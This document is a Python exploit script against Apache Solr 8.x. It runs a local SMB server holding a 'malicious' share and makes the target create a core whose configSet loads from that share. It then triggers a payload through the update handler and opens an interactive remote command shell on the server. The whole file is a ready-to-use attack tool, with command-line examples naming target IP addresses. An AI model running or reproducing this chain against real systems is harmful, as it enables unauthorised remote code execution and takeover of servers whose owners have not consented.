#!/usr/bin/env python3 import requests import time import sys import argparse import random import string import threading import socket from pathlib import Path from impacket import smbserver def generate_random_chars(length=8): return ''.join(random.choices(string.ascii_lowercase + string.digits, k=length)) def get_local_ip(): try: # Connect to a dummy address to determine local IP with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s: s.connect(("8.8.8.8", 80)) return s.getsockname()[0] except Exception: return "127.0.0.1" def start_smb_server(share_name="malicious", port=445): def run_server(): try: files_path = str(Path("files").absolute()) # Create SMB server instance server = smbserver.SimpleSMBServer(listenAddress="0.0.0.0", listenPort=port) server.addShare(share_name.upper(), files_path) server.setSMB2Support(True) server.start() except Exception as e: print(f"[!] Error starting SMB server: {e}") # Start server in background thread server_thread = threading.Thread(target=run_server, daemon=True) server_thread.start() time.sleep(2) return server_thread def create_solr_core(host, port, smb_host, share_name): """ Create Solr core that pulls malicious config from SMB server. """ base_url = f"http://{host}:{port}" endpoint = "/solr/admin/cores" # Generate random core name core_name = f"exploit_core_{generate_random_chars()}" # UNC path to our malicious SMB share malicious_configset = f"//{smb_host}/{share_name}" params = { '_': int(time.time() * 1000), 'action': 'CREATE', 'configSet': malicious_configset, 'name': core_name, 'wt': 'json' } headers = { 'X-Requested-With': 'XMLHttpRequest', 'Accept-Language': 'en-US,en;q=0.9', 'Accept': 'application/json, text/plain, */*', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36', 'Accept-Encoding': 'gzip, deflate, br', 'Connection': 'keep-alive' } try: print(f"[*] Sending core creation request to: {base_url}{endpoint}") response = requests.get( f"{base_url}{endpoint}", params=params, headers=headers, timeout=30 ) print(f"[*] Response Status Code: {response.status_code}") # Parse JSON response if possible try: json_response = response.json() if 'error' in json_response: print(f"[!] Error creating core: {json_response['error']}") return False, None else: print(f"[*] Core '{core_name}' created successfully!") return True, core_name except ValueError: print(f"[!] Non-JSON response: {response.text}") return False, None except requests.exceptions.RequestException as e: print(f"[!] Request failed: {e}") return False, None def trigger_payload(host, port, core_name): """ Trigger the malicious payload by sending a request to the update handler. """ print(f"[*] Triggering payload execution") base_url = f"http://{host}:{port}" endpoint = f"/solr/{core_name}/update" # Simple document to trigger the update processor payload_data = ''' exploit_trigger Exploit Trigger ''' headers = { 'Content-Type': 'application/xml', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36' } try: print(f"[*] Sending payload to: {base_url}{endpoint}") response = requests.post( f"{base_url}{endpoint}", data=payload_data, headers=headers, params={ 'wt': 'json', 'cmd': 'whoami' }, timeout=30 ) if response.status_code == 200: print(f"[*] Payload executed successfully!") # Start interactive shell after successful test interactive_shell(host, port, core_name) return True else: print(f"[!] Payload execution may have failed") return False except requests.exceptions.RequestException as e: print(f"[!] Request failed: {e}") return False def execute_command(host, port, core_name, command): base_url = f"http://{host}:{port}" endpoint = f"/solr/{core_name}/update" payload_data = '{"add": {"doc": {"id": "interactive", "title": "Interactive"}}}' headers = { 'Content-Type': 'application/json', 'User-Agent': 'Mozilla/5.0' } try: resp = requests.post( f"{base_url}{endpoint}", data=payload_data, headers=headers, params={ 'wt': 'json', 'cmd': command }, timeout=30 ) if resp.status_code != 200: return False, f"HTTP {resp.status_code}", None try: data = resp.json() stdout = data.get('stdout', '') stderr = data.get('stderr', '') exit_code = data.get('exit_code', 0) status = data.get('status', '') return True, { 'stdout': stdout, 'stderr': stderr, 'exit_code': exit_code, 'status': status }, data except Exception: return False, "JSON parse failed", None except Exception as e: return False, str(e), None def interactive_shell(host, port, core_name): while True: try: cmd = input("\nsolr> ").strip() if not cmd: continue if cmd.lower() in ('exit','quit'): print("[*] exiting shell...") break ok, result, raw = execute_command(host, port, core_name, cmd) if ok: print(f"[+] exit_code: {result['exit_code']}, status: {result['status']}") if result['stdout']: print("--- stdout ---") print(result['stdout'].rstrip()) if result['stderr']: print("--- stderr ---") print(result['stderr'].rstrip()) else: print(f"[!] command failed: {result}") except KeyboardInterrupt: print("\n[*] interrupted") break def parse_args(): parser = argparse.ArgumentParser( description="Solr 8.x Exploit Chain - configSet core creation via SMB", formatter_class=argparse.RawDescriptionHelpFormatter, epilog=""" Examples: %(prog)s 192.168.35.31 %(prog)s 10.0.0.1 --port 8983 %(prog)s 192.168.1.100 --smb-port 445 --smb-host 192.168.1.50 """ ) parser.add_argument('target_host', help='Target Solr server IP address') parser.add_argument('--port', '-p', type=int, default=8983, help='Solr server port (default: 8983)') parser.add_argument('--smb-host', help='SMB server IP (default: auto-detect local IP)') parser.add_argument('--smb-port', type=int, default=445, help='SMB server port (default: 445)') parser.add_argument('--share-name', default='malicious', help='SMB share name (default: malicious)') return parser.parse_args() def main(): args = parse_args() print(f"[*] Target: {args.target_host}:{args.port}") smb_host = args.smb_host or get_local_ip() print(f"[*] SMB Server: {smb_host}:{args.smb_port}") print(f"[*] Share Name: {args.share_name}") try: # Start SMB server print(f"\n[*] Starting SMB Server on {smb_host}:{args.smb_port}") server_thread = start_smb_server(args.share_name, args.smb_port) print("[*] Waiting for SMB server to start...") time.sleep(3) # Create malicious Solr core print(f"\n[*] Creating Solr Core") success, core_name = create_solr_core(args.target_host, args.port, smb_host, args.share_name) if not success: print("[!] Failed to create Solr core!") return False # Trigger payload execution print(f"\n[*] Triggering Payload") trigger_payload(args.target_host, args.port, core_name) # Keep SMB server running for a bit time.sleep(30) return True except Exception as e: print(f"\n[!] Exploit failed: {e}") return False if __name__ == "__main__": main()